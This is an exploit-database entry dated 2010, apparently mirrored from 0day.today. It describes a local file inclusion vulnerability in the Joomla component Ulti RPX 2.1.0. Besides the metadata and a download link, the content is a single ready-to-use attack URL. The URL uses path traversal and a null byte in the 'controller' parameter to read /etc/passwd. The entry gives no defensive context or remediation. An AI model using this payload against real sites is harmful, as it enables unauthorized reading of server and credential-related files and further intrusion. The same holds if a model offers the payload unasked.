id: 11327
date: 03/15/2010
title: Joomla component com_rpx Ulti RPX v2.1.0 Local File Include
author: jdc
cves: 

===========================================================
Joomla component com_rpx Ulti RPX v2.1.0 Local File Include
===========================================================

Joomla component Ulti RPX 2.1.0 Local File Include
Version     : 2.1.0
Author      : jdc
Download : http://www.ultijoomla.com/downloads?func=fileinfo&id=33
 
http://site/index.php?option=com_rpx&controller=../../../../../etc/passwd%00 



#  0day.today [2023-03-24]  #